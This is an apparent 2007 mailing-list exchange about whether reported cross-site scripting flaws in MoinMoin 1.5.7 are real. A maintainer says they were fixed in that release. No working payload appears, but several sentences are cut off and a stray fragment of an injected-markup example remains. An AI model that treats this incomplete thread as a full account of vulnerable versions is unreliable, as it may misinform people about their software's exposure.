It's come to my attention that a few relatively recent security reports
allege vulnerabilities including cross-site scripting in MoinMoin up to
and including release 1.5.7
However, I've been able to find no corroborating information on the
moinmoin site, mailing list, or changelog
(http://moinmoin.wikiwikiweb.de/MoinMoinRelease1.5/CHANGES), making me a
bit suspicious the reports are incorrect, since I would assume the
MoinMoin site would be among the first to know, or be notified, about
These reports refer to CVE-2007-901 and 902:
which in turn cites sources like secunia.com and securityfocus.com
Notably, one CVE citation refers to ubuntu.com although the ubuntu
report itself appears to apply to moinmoin-1.5.3 and lower
So it seems to me that these security reports may be incorrect in
listing the 1.5.7 release as vulnerable; rather, it may be a problem
with an earlier version and CVE is incorrect that this applies to the
newest release, 1.5.7 (or am I missing
Does anyone know about the validity of these security reports w.r.t.
From: Thomas Waldmann <tw-public@gm...> - 2007-03-17 13:24:05
> It's come to my attention that a few relatively recent security reports
> allege vulnerabilities including cross-site scripting in MoinMoin up to
> and including release 1.5.7
The pagename (AttachFile, RenamePage, LocalSiteMap) and page info XSS
bugs were fixed in 1.5.7 and this is documented in docs/CHANGES.
The other report advising show_traceback (this seems to be a 3rd party
patch, not a moin feature) as solution for another potential
vulnerability is rather vague about what the exact problem is and what
the exploit could be.
Whether showing version numbers of some involved software (OS, Python,
Moin) is a security bug by itself is discussable. One thing is sure: if
we disable tracebacks and version information, the reported bugs by our
users would be of much lower quality and debugging would be harder and
In general, I must say that I am a bit disappointed with the quality of
such security reports and some security news (like that on heise
recently). They are partly incorrect, rather vague and sometimes seem to
over-hype things a bit (like heise first telling that you could execute
code on the SERVER - they fixed it some hours later) and heavy
crosslinking of such things doesn't help either.
Of course XSS is a problem, but, for the recent moin cases, it is not
something to panic about.
here>Bla, you will notice that on RecentChanges. Similar thing if
someone tries to trick you to go to some URL of that kind, you will
notice it (hopefully) before you click.
If you can be tricked into such stuff, I guess you will be "fished"
daily anyway (and those guys don't just steal your moin cookie, but $$$$
from your bank/paypal/whatever account).